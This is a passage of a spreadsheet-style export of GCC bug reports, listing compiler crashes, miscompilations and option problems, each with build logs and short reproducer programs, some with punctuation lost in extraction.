FAIL: libgomp.oacc-fortran/acc_on_device-1-2.f -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0  -O  execution test
FAIL: libgomp.oacc-fortran/acc_on_device-1-3.f -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0  -O  execution test
Note that these failures would have been easier to spot if the results were not polluted by pages of useless guality failures.</t>
  </si>
  <si>
    <t>GCC-48608</t>
  </si>
  <si>
    <t>Alignment adjust of local variables is lost</t>
  </si>
  <si>
    <t>We have
static unsigned int
get_decl_align_unit (tree decl)
{
  unsigned int align = LOCAL_DECL_ALIGNMENT (decl)
  return align / BITS_PER_UNIT
}
LOCAL_DECL_ALIGNMENT may increase alignment for local
variable.  But it is never saved.  DECL_ALIGN (decl)
returns the old alignment.</t>
  </si>
  <si>
    <t>GCC-49816</t>
  </si>
  <si>
    <t>arm.c:3999:12: error: converting 'false' to pointer type 'rtx'</t>
  </si>
  <si>
    <t>/home/dave/gnu/gcc/objdir/./prev-gcc/g++ -B/home/dave/gnu/gcc/objdir/./prev-gcc/
 -B/home/dave/opt/gnu/gcc/gcc-4.7/armv5tejl-unknown-linux-gnueabi/bin/ -nostdinc
++ -B/home/dave/gnu/gcc/objdir/prev-armv5tejl-unknown-linux-gnueabi/libstdc++-v3
/src/.libs -B/home/dave/gnu/gcc/objdir/prev-armv5tejl-unknown-linux-gnueabi/libs
tdc++-v3/libsupc++/.libs -I/home/dave/gnu/gcc/objdir/prev-armv5tejl-unknown-linu
x-gnueabi/libstdc++-v3/include/armv5tejl-unknown-linux-gnueabi -I/home/dave/gnu/
gcc/objdir/prev-armv5tejl-unknown-linux-gnueabi/libstdc++-v3/include -I/home/dav
e/gnu/gcc/gcc/libstdc++-v3/libsupc++ -L/home/dave/gnu/gcc/objdir/prev-armv5tejl-
unknown-linux-gnueabi/libstdc++-v3/src/.libs -L/home/dave/gnu/gcc/objdir/prev-armv5tejl-unknown-linux-gnueabi/libstdc++-v3/libsupc++/.libs -c  -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror   -DHAVE_CONFIG_H -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I/home/dave/opt/gnu/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber   -I/home/dave/opt/gnu/include \
                ../../gcc/gcc/config/arm/arm.c -o arm.o
../../gcc/gcc/config/arm/arm.c: In function 'rtx_def* aapcs_vfp_allocate_return_reg(arm_pcs machine_mode const_tree)':
../../gcc/gcc/config/arm/arm.c:3999:12: error: converting 'false' to pointer type 'rtx' [-Werror=conversion-null]
cc1plus: all warnings being treated as errors</t>
  </si>
  <si>
    <t>GCC-43857</t>
  </si>
  <si>
    <t>-fresolution causes an ICE</t>
  </si>
  <si>
    <t>in gcc/lto/lang.opt one finds an -fresolution option.
First this option appears undocumented but more
importantly 
troutmask:sgk[228] cat h.c
#include 
void
hello(void)
{
  printf(Hello world\n)
}
troutmask:sgk[229] cat m.c
void hello(void)
int
main(void)
{
  hello()
  return (0)
}
troutmask:sgk[230] cat Makefile
all:
        ${HOME}/work/4x/bin/gcc -flto -c m.c
        ${HOME}/work/4x/bin/gcc -flto -c h.c
        ${HOME}/work/4x/bin/gcc -flto -o z h.o m.o
        ./z
        ${HOME}/work/4x/bin/gcc -flto -fresolution -o z h.o m.o
clean:
        rm *.o
troutmask:sgk[231] make
/home/sgk/work/4x/bin/gcc -flto -c m.c
/home/sgk/work/4x/bin/gcc -flto -c h.c
/home/sgk/work/4x/bin/gcc -flto -o z h.o m.o
./z
Hello world
/home/sgk/work/4x/bin/gcc -flto -fresolution -o z h.o m.o
lto1: internal compiler error: in read_cgraph_and_symbols at lto/lto.c:1797
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: /home/sgk/work/4x/bin/gcc returned 1 exit status
collect2: lto-wrapper returned 1 exit status
*** Error code 1
Stop in /usr/home/sgk/tmp/ctest.</t>
  </si>
  <si>
    <t>GCC-7324</t>
  </si>
  <si>
    <t>Internal compiler error in fixup_var_refs_1 at function.c:1874</t>
  </si>
  <si>
    <t>See attached source code.  Compile with cc -O and get
the message
foo.c:41: Internal compiler error in fixup_var_refs_1 at function.c:1874
Release:
2.96
Environment:
Redhat 7.2
How-To-Repeat:
Compile enclosed code with 2.96 compiler and -O flag.</t>
  </si>
  <si>
    <t>GCC-33318</t>
  </si>
  <si>
    <t>[4.3 Regression] fortran/expr.c:305: internal compiler error: internal consistency failure</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/./prev-gcc/xgcc -B/test/gnu/gcc/objdir/./prev-gcc/ -B/opt/g
nu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/bin/ -c   -g -O2 -DIN_GCC   -W -Wall -Wwr
ite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmi
ssing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros
                     -Wno-overlength-strings -Werror -fno-common   -DHAVE_CONFIG
_H -I. -Ifortran -I../../gcc/gcc -I../../gcc/gcc/fortran -I../../gcc/gcc/../incl
ude -I../../gcc/gcc/../libcpp/include -I/opt/gnu64/gcc/gcc-4.3.0/include  -I../.
./gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber
   ../../gcc/gcc/fortran/expr.c -o fortran/expr.o
../../gcc/gcc/fortran/expr.c: In function 'copy_ref':
../../gcc/gcc/fortran/expr.c:305: error: invalid rtl sharing found in the insn
(jump_insn 25 100 101 5 ../../gcc/gcc/fortran/expr.c:283 (set (pc)
        (if_then_else (eq (subreg/s/u:SI (reg:DI 71 [ D.8737 ]) 4)
                (const_int 0 [0x0]))
            (label_ref 29)
            (pc))) 46 {*pa.md:1770} (expr_list:REG_BR_PROB (const_int 5000 [0x13
88])
        (nil)))
../../gcc/gcc/fortran/expr.c:305: error: shared rtx
(subreg/s/u:SI (reg:DI 71 [ D.8737 ]) 4)
../../gcc/gcc/fortran/expr.c:305: internal compiler error: internal consistency
failure</t>
  </si>
  <si>
    <t>GCC-18370</t>
  </si>
  <si>
    <t>[3.4 Regression] cp_parser_initializer_list uninit variable problems</t>
  </si>
  <si>
    <t>I just tried to compile this code on a i686 Linux box with valgrind 2.2
int p1[ 10 ] =
{
	0 0 0 0 2 0 2 0 2 3
}
The compiler said
[dcb@localhost src]$ ~/valgrind/results.220/bin/valgrind --tool=memcheck
--trace-children=yes -q ~/gnu/gcc343/results/bin/g++  -Wno-deprecated -c
gcc343bug.cc
==30646== Conditional jump or move depends on uninitialised value(s)
==30646==    at 0x80E6AF0: cp_parser_initializer_list (parser.c:11646)
==30646==    by 0x80E69A1: cp_parser_initializer_clause (parser.c:11581)
==30646==    by 0x80F058B: cp_parser_init_declarator (parser.c:11486)
==30646==    by 0x80EAC01: cp_parser_simple_declaration (parser.c:6524)
[dcb@localhost src]$
The compiler source code is
      initializer = cp_parser_initializer_clause (parser
      if (clause_non_constant_p)
Suggest that variable clause_non_constant_p hasn't been initialised 
by routine cp_parser_initializer_clause.</t>
  </si>
  <si>
    <t>GCC-49049</t>
  </si>
  <si>
    <t>ICE in copyprop_hardreg_forward_1 at regcprop.c:767</t>
  </si>
  <si>
    <t>Created attachment 24285
preprocessed source
$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: arm-unknown-linux-gnueabi
Configured with: ../configure --target=arm-unknown-linux-gnueabi --prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi --with-sysroot=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi//sys-root --disable-multilib --with-local-prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-c99 --enable-long-long --enable-target-optspace target_alias=arm-unknown-linux-gnueabi --enable-languages=c++ --disable-shared --disable-libmudflap --disable-libssp
Thread model: posix
gcc version 4.7.0 20110517 (experimental) [trunk revision 173832] (GCC) 
$ ./xgcc -B. ~/ice.i -O3
/home/ryan/ice.i: In function 'foo':
/home/ryan/ice.i:28:1: error: insn does not satisfy its constraints:
(insn 98 35 37 3 (set (reg:SI 4 r4 [195])
        (minus:SI (const_int 4 [0x4])
            (const_int 861 [0x35d]))) /home/ryan/ice.i:6 29 {*arm_subsi3_insn}
     (nil))
/home/ryan/ice.i:28:1: internal compiler error: in copyprop_hardreg_forward_1 at regcprop.c:767
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-3344</t>
  </si>
  <si>
    <t>internal compiler error in 'change_address' at emit-rtl.c on alpha</t>
  </si>
  <si>
    <t>On an alpha running Tru64 4.0f when compiling c-parse.c from application 126.gcc of SPECInt95 with the flag -ffixed-\$15 I get interenal compiler error.  Other flags such as -ffixed-\$14 don't induce the error.  Similarly other c files compile OK with the -ffixed-\$5 flag. Here is the command line that produces the error:
main% /projects/smt11/redstone/usr/local/bin/gcc  -v -save-temps    -c -o c-parse.o  -DSPEC  -O3 -mcpu=ev6 -ffixed-\$15 c-parse.c
Reading specs from /projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/specs
gcc version 2.95.3 20010315 (release)
GNU CPP version 2.95.3 20010315 (release)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/../../../../alphaev6-dec-osf4.0f/include
 /projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/../../../../include/g++-3
End of omitted list.
 /projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/cc1 c-parse.i -quiet -dumpbase c-parse.c -mcpu=ev6 -O3 -version -ffixed-$15 -o c-parse.s
GNU C version 2.95.3 20010315 (release) (alphaev6-dec-osf4.0f) compiled by GNU C version 2.95.3 20010315 (release).
In file included from /projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/include/stdarg.h:36
                 from gvarargs.h:4
                 from tree.h:20
                 from c-parse.y:50:
/projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/include/va-alpha.h:36: warning: redefinition of `va_list'
/projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/include/va_list.h:7: warning: `va_list' previously declared here
bison.simple: In function `yyparse':
bison.simple:315: warning: type mismatch in implicit declaration for built-in function `alloca'
bison.simple:674: Internal compiler error in `change_address' at emit-rtl.c:1619
Please submit a full bug report.
See  for instructions.
Release:
2.95.3 20010315 (release)
Environment:
main% uname -a
OSF1 venus.cs.washington.edu V4.0 1229 alpha
main% /projects/smt11/redstone/usr/local/bin/gcc  -v
Reading specs from /projects/smt11/redstone/usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95.3/specs
gcc version 2.95.3 20010315 (release)
How-To-Repeat:
Compile the file as I described.  The file is located in 
/spec/benchspec/CINT95/126.gcc/src of the SPECInt95 distribution.</t>
  </si>
  <si>
    <t>redstone</t>
  </si>
  <si>
    <t>GCC-17806</t>
  </si>
  <si>
    <t>[4.0 Regression] compiler error: in verify_loop_structure at cfgloop.c:1491  works -O2 breaks with -O3</t>
  </si>
  <si>
    <t>from package 'superlu':
works with -O2
/home/olaf/toolchain/obj/gcc-head-2004-10-03/inst/libexec/gcc/powerpc-unknown-linux-gnu/4.0.0/cc1 /tmp/mmd.i -fpreprocessed -o /dev/null  -quiet -O3
mmd.c: In function 'mmdupd_':
mmd.c:573: error: Basic block 127 should be marked irreducible.
mmd.c:573: error: Edge from 127 to 98 should be marked irreducible.
mmd.c:573: error: Basic block 131 should be marked irreducible.
mmd.c:573: error: Edge from 131 to 107 should be marked irreducible.
mmd.c:573: internal compiler error: in verify_loop_structure at cfgloop.c:1491
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-52216</t>
  </si>
  <si>
    <t>[C++11] Wrong exception deduction for some forms of placement new</t>
  </si>
  <si>
    <t>gcc 4.7.0 20111210 (experimental) rejects the following program:
//--
#include 
int n
static_assert(!noexcept(::new (std::nothrow) int[n]) )
//--
Further the following program aborts even though it shouldn't:
//---
#include 
extern C void abort()
void test_too_small(int n) {
 new (std::nothrow) int[n]{1234}
}
int main()
{
  bool f = false
  try {
    test_too_small(3)
  } catch (...) {
    f = true
  }
  if (!f)
    abort()
}
//---
Rationale: According to [expr.new] p7:
[..] if the new-initializer is a bracedinit-list for which the number of initializer-clauses exceeds the number of elements to initialize no storage
is obtained and the new-expression terminates by throwing an exception of a type that would match a handler (15.3) of type std::bad_array_new_length (18.6.2.2).
I guess that part of the problem is due to the currently missing support of type std::bad_array_new_length.</t>
  </si>
  <si>
    <t>GCC-66600</t>
  </si>
  <si>
    <t>sign_mask meets valgrind</t>
  </si>
  <si>
    <t>Created attachment 35814
gzipped C source code
I have gcc trunk dated 20150617 compiled with --enable-checking=valgrind
and the attached code when compiled with -O2 produces this:
==7615== Conditional jump or move depends on uninitialised value(s)
==7615==    at 0xBAB0E1: sign_mask (wide-int.h:801)
==7615==    by 0xBAB0E1: neg_p &gt; (wide-int.h:
1692)
==7615==    by 0xBAB0E1: get_int_cst_ext_nunits(tree_node* generic_wide_int&lt;wid
e_int_storage&gt; const&amp;) (tree.c:1218)
==7615==    by 0xBBC7E3: wide_int_to_tree(tree_node* generic_wide_int&lt;wide_int_
ref_storage &gt; const&amp;) (tree.c:1399)</t>
  </si>
  <si>
    <t>GCC-31141</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with ellipsis in template parameter list</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline:
========================================
template void foo(int x[1][N])
void bar()
{
  int x[1][1]
  foo(x)
}
========================================
bug.cc:1: error: ISO C++ does not include variadic templates
bug.cc: In function 'void bar()':
bug.cc:1: internal compiler error: tree check: expected class 'expression' have 'constant' (integer_cst) in tsubst_pack_expansion at cp/pt.c:6829
Please submit a full bug report [etc.]
Looks like this was caused by your patch for variadic templates Douglas:
2007-03-09  Douglas Gregor  
	PR c++/20599
	* typeck.c (check_return_expr): Check for bare parameter packs.
	(comptypes): Compare template parameter packs and
	type pack expansions.
        ...</t>
  </si>
  <si>
    <t>GCC-79909</t>
  </si>
  <si>
    <t>[7 Regression] ICE error: invalid rtl sharing found in the insn on ppc64le</t>
  </si>
  <si>
    <t>We ICE on:
$ ppc64le-linux-gnu-g++ /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass-5_x.C -mxl-compat -O
In file included from /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass-5_x.C:5:0:
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass_x.h: In function â€˜void test2_d128(dec128 dec128 dec128 dec128 dec128 dec128 dec128 dec128)â€™:
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass_x.h:33:1: error: invalid rtl sharing found in the insn
 }        \
 ^
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass_x.h:149:1: note: in expansion of macro â€˜Tâ€™
 T(d128 dec128 (dec128)3.5DL)
 ^
(call_insn 74 72 0 2 (parallel [
            (call (mem:SI (symbol_ref:DI (_Z8testd128DeDeDeDeDeDeDeDeDeDeDeDeDeDeDeDe) [flags 0x41] ) [0 testd128 S4 A8])
                (const_int 256 [0x100]))
            (clobber (reg:DI 65 lr))
        ]) /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass_x.h:149 667 {*call_nonlocal_aixdi}
     (expr_list:REG_CALL_DECL (symbol_ref:DI (_Z8testd128DeDeDeDeDeDeDeDeDeDeDeDeDeDeDeDe) [flags 0x41] )
        (expr_list:REG_DEAD (reg:TD 34 2)
            (expr_list:REG_DEAD (reg:TD 36 4)
                (expr_list:REG_DEAD (reg:TD 38 6)
                    (expr_list:REG_DEAD (reg:TD 40 8)
                        (expr_list:REG_DEAD (reg:TD 42 10)
                            (expr_list:REG_DEAD (reg:TD 44 12)
                                (nil))))))))
    (expr_list (use (reg:DI 2 2))
        (expr_list:TD (use (reg:TD 34 2))
            (expr_list:TD (use (reg:TD 36 4))
                (expr_list:TD (use (reg:TD 38 6))
                    (expr_list:TD (use (reg:TD 40 8))
                        (expr_list (use (reg:TD 42 10))
                            (expr_list (use (reg:TD 44 12))
                                (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                    (const_int 32 [0x20]))
                                                (const_int 64 [0x40])) [0  S16 A64]))
                                    (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                        (const_int 32 [0x20]))
                                                    (const_int 80 [0x50])) [0  S16 A64]))
                                        (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                            (const_int 32 [0x20]))
                                                        (const_int 96 [0x60])) [0  S16 A64]))
                                            (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                (const_int 32 [0x20]))
                                                            (const_int 112 [0x70])) [0  S16 A64]))
                                                (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                    (const_int 32 [0x20]))
                                                                (const_int 128 [0x80])) [0  S16 A64]))
                                                    (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                        (const_int 32 [0x20]))
                                                                    (const_int 144 [0x90])) [0  S16 A64]))
                                                        (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                            (const_int 32 [0x20]))
                                                                        (const_int 160 [0xa0])) [0  S16 A64]))
                                                            (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                                (const_int 32 [0x20]))
                                                                            (const_int 176 [0xb0])) [0  S16 A64]))
                                                                (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                                    (const_int 32 [0x20]))
                                                                                (const_int 192 [0xc0])) [0  S16 A64]))
                                                                    (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                                        (const_int 32 [0x20]))
                                                                                    (const_int 208 [0xd0])) [0  S16 A64]))
                                                                        (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                                            (const_int 32 [0x20]))
                                                                                        (const_int 224 [0xe0])) [0  S16 A64]))
                                                                            (expr_list:TD (use (mem:TD (plus:DI (plus:DI (reg/f:DI 1 1)
                                                                                                (const_int 32 [0x20]))
                                                                                            (const_int 240 [0xf0])) [0  S16 A64]))
                                                                                (nil)))))))))))))))))))))
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass_x.h:33:1: error: shared rtx
 }        \
 ^
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass_x.h:149:1: note: in expansion of macro â€˜Tâ€™
 T(d128 dec128 (dec128)3.5DL)
 ^
(plus:DI (reg/f:DI 1 1)
    (const_int 32 [0x20]))
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass_x.h:33:1: internal compiler error: internal consistency failure
 }        \
 ^
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/compat/decimal/pass_x.h:149:1: note: in expansion of macro â€˜Tâ€™
 T(d128 dec128 (dec128)3.5DL)
 ^
0xa02b7b verify_rtx_sharing
	.././../gcc/emit-rtl.c:2774
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa02a91 verify_rtx_sharing
	.././../gcc/emit-rtl.c:2789
0xa075e7 verify_rtl_sharing()
	.././../gcc/emit-rtl.c:2883
0xc90222 execute_function_todo
	.././../gcc/passes.c:1983
0xc90c05 execute_todo
	.././../gcc/passes.c:2016</t>
  </si>
  <si>
    <t>GCC-4838</t>
  </si>
  <si>
    <t>Internal compiler error in `assign_stack_temp_for_type' at function.c:940</t>
  </si>
  <si>
    <t>#include 
#include 
main()
{
    char *def[1000000000]
}
Release:
unknown
Environment:
FreeBSD 4.4-RELEASE
How-To-Repeat:
run the small code in Description</t>
  </si>
  <si>
    <t>sonny</t>
  </si>
  <si>
    <t>GCC-808</t>
  </si>
  <si>
    <t>&amp;&amp;error is calculated incorrectly under -O2</t>
  </si>
  <si>
    <t>In the following code the &amp;&amp;error is calculated incorrectly under -O2
but correctly under normal optimization.  This is the assembly under -O2:
Dump of assembler code for function __copy_from_user:
0x80484a0 :   push   %ebp
0x80484a1 : mov    %esp%ebp
0x80484a3 : push   %edi
0x80484a4 : push   %esi
0x80484a5 : push   %ebx
0x80484a6 : sub    $0x18%esp
0x80484a9 : push   $0x80484a0
0x80484ae :        mov    0x8(%ebp)%edi
0x80484b1 :        mov    0xc(%ebp)%esi
0x80484b4 :        mov    0x10(%ebp)%ebx
0x80484b7 :        call   0x804848c 
The instruction at 0x80484a9 is calculating &amp;&amp;error as 0x80484a0 which is
the start of the procedure.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Linux sparrow.websense.net 2.4.0-test11 #37 Sun Nov 12 00:55:35 EST 2000 i686 unknown
RedHat Linux 7.0
glibc 2.1.94</t>
  </si>
  <si>
    <t>wstearns</t>
  </si>
  <si>
    <t>GCC-42661</t>
  </si>
  <si>
    <t>Documented -mmad option not accepted.</t>
  </si>
  <si>
    <t>$ mips64-linux-gcc --version
mips64-linux-gcc (GCC) 4.5.0 20091201 (experimental) [trunk revision 154864]
The fine GCC documentation says:
-mmad
-mno-mad
    Enable (disable) use of the mad madu and mul instructions as provided by the R4650 ISA.
I get:
$ mips64-linux-gcc -march=r5000 -mmad -S hello.c
cc1: error: unrecognized command line option -mmad
$ mips64-linux-gcc -march=r5000 -mno-mad -S hello.c
cc1: error: unrecognized command line option -mno-mad
But these undocumented options are accpeted:
$ mips64-linux-gcc -march=r5000 -mad -S hello.c
$ mips64-linux-gcc -march=r5000 -mno-ad -S hello.c</t>
  </si>
  <si>
    <t>GCC-65946</t>
  </si>
  <si>
    <t>Simple loop with if-statement not vectorized</t>
  </si>
  <si>
    <t>This testcase:
#define N 32
int a[N] b[N]
int
foo ()
{
  for (int i = 0 i &lt; N  i++)
  {
    int m = (a[i] 
    b[i] = a[i] * m
  }
}
does not vectorize at -O3 on x86_64 or other platforms. Following dom1 jump threading partially peels the loop to give:
  :
  goto 
  :
  # i_11 = PHI 
  _5 = a[i_11]
  _6 = i_11 
  if (_6 != 0)
    goto 
  else
    goto 
  :
  :
  # m_14 = PHI 
  :
  # m_2 = PHI 
  # _15 = PHI 
  # i_16 = PHI 
  _7 = m_2 * _15
  b[i_16] = _7
  i_9 = i_16 + 1
  if (i_9 != 32)
    goto 
  else
    goto 
  :
  return
  :
  # i_1 = PHI 
  _10 = a[i_1]
  _3 = i_1 
  goto 
which form cannot be if-converted (tree-if-conv.c):
  /* If one of the loop header's edge is an exit edge then do not
     apply if-conversion.  */
  FOR_EACH_EDGE (e ei loop-&gt;header-&gt;succs)
    if (loop_exit_edge_p (loop e))
      return false
and even if it were the PHI nodes at loop entry cannot be handled by the vectorizer.</t>
  </si>
  <si>
    <t>GCC-11798</t>
  </si>
  <si>
    <t>ICE in Open Inventor GeneralizedCylinder.c++</t>
  </si>
  <si>
    <t>$ g++ -o /dev/null -c -fPIC -O GeneralizedCylinder.ii
GeneralizedCylinder.c++: In method `void
GeneralizedCylinder::initSpineKeyPointRotations()':
GeneralizedCylinder.c++:478: Internal compiler error.
GeneralizedCylinder.c++:478: Please submit a full bug report.
GeneralizedCylinder.c++:478: See 
$ g++ -v
Reading specs from /usr/lib/gcc-lib/i386-slackware-linux/2.95.3/specs
gcc version 2.95.3 20010315 (release)
Note that the optimization settings -fPIC -O are necessary to trigger
the ICE.  I'll attach the preprocessed input file as the next step (assuming
this works like Mozilla's bugzilla...)</t>
  </si>
  <si>
    <t>GCC-31620</t>
  </si>
  <si>
    <t>[4.3 regression] Zeroing one component of array of derived types zeros the whole structure.</t>
  </si>
  <si>
    <t>If an array of a derived type is declared and one component is set to zero then all the components are set to zero. The following program illustrates the problem:
program test_assign
  type my_type
     integer :: a
     integer :: b 
  end type my_type
  type(my_type) dimension(1) :: mine
  mine%b=4
  print * Should be 4:  mine%b
  mine%a=1
  print * Should be 4:  mine%b
  mine%a=0
  print * Should be 4:  mine%b
  print * Should be 0:  mine%a
end program test_assign
The output of this is:
 Should be 4:            4
 Should be 4:            4
 Should be 4:            0
 Should be 0:            0
Note the third line.</t>
  </si>
  <si>
    <t>GCC-47023</t>
  </si>
  <si>
    <t>C_Sizeof: Rejects valid code</t>
  </si>
  <si>
    <t>The following program is rejected with:
print * c_sizeof(a)
                  1
Error: 'x' argument of 'c_sizeof' intrinsic at (1) must be be an interoperable data entity
However a is an kind-4 INTEGER which is interoperable. It works if one uses integer(c_int) - however the message is completely bogus. While for a BIND(C) procedure the size matters for c_sizeof a c_int vs. c_long vs. c_signed_char are all completely valid thus all kind numbers should be fine.
use iso_c_binding
implicit none
integer :: a(5)
print * sizeof(a)
print * c_sizeof(a)
end</t>
  </si>
  <si>
    <t>GCC-61340</t>
  </si>
  <si>
    <t>ipa-pure-const.c ipa-reference.c: possible missing switch cases ?</t>
  </si>
  <si>
    <t>1.
trunk/gcc/ipa-pure-const.c:1270:16: warning: enumeration value 'IPA_REF_ALIAS' not handled in switch [-Wswitch]
Source code is
          switch (ref-&gt;use)
Some code to deal with the IPA_REF_ALIAS might be a good idea.
2.
trunk/gcc/ipa-reference.c:474:15: warning: enumeration value 'IPA_REF_ALIAS' not handled in switch [-Wswitch]
Source code is
      switch (ref-&gt;use)</t>
  </si>
  <si>
    <t>GCC-355</t>
  </si>
  <si>
    <t>Compiler takes up an extra 4 bytes when using double in an union in a structure</t>
  </si>
  <si>
    <t>The problem is that when you compile a program where it has a union inside a structure which contains a double the structure take up an extra 4 bytes. The is a problem because this structure is being returned to my program from a library not compiled with gcc and doesn't have this extra 4 bytes before the union. The attached program is what I used to determine what was causing the displacement. I was compileing with cc and the with gcc to see the difference.
Release:
gcc 2.95.2 from the precompiled versions.
Environment:
AIX 4.3.3
How-To-Repeat:
just do a gcc a.c and run.</t>
  </si>
  <si>
    <t>gheydon</t>
  </si>
  <si>
    <t>GCC-53648</t>
  </si>
  <si>
    <t>[C++11] nested empty tuples</t>
  </si>
  <si>
    <t>#include 
int main(){
    auto b = std::tuple&gt;&gt;{}
}
gives : 
error: 'std::_Tuple_impl' is an ambiguous base of 'std::_Tuple_impl &gt; &gt;'</t>
  </si>
  <si>
    <t>GCC-80622</t>
  </si>
  <si>
    <t>[8 Regression] wrong code at -O1 and above in both 32-bit and 64-bit modes on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170503 (experimental) [trunk revision 247550] (GCC) 
$ gcc-trunk small.c -O3  ./a.out
0
$ gcc-trunk small.c -O3 -m32  ./a.out
0
$ gcc-trunk small.c -O1 -m32  ./a.out
0
$ gcc-trunk small.c -O0 -m32  ./a.out
4
$ 
$ cat small.c
int printf(const char * ...)
struct S2 {
  int f2
  char f4
  int f5
  char f6
} a
int main() {
  struct S2 b[][1] = {3 0 3 4 3 0 3 4 3 0 3 4 3 0 3 4 3
                      0 3 4 3 0 3 4 3 0 3 4 3 0 3 4 3 0
                      3 4 3 4 7 7 3 5 0 3 4 7 7 3 5 0 3
                      4 3 4 7 7 3 5 0 3 4 7 7 3 5 0 3 4}
  a = b[4][0]
  b[4][0].f4 
  return 0
}
$    
$ gcc-5.4 small.c -O3 -m32  ./a.out
4
$</t>
  </si>
  <si>
    <t>GCC-4749</t>
  </si>
  <si>
    <t>22_local/codecvt.cc failure on cygwin</t>
  </si>
  <si>
    <t>libstdc++-v3 test 22_local/codecvt.cc fails on cygwin.  Compiler output is:
/usr/local/src/gcc/libstdc++-v3/testsuite/22_locale/codecvt.cc:0: warning: -ffunction-sections
   may affect debugging on some targets.
/usr/local/src/gcc/libstdc++-v3/testsuite/22_locale/codecvt.cc: In function 
   `void test02()':
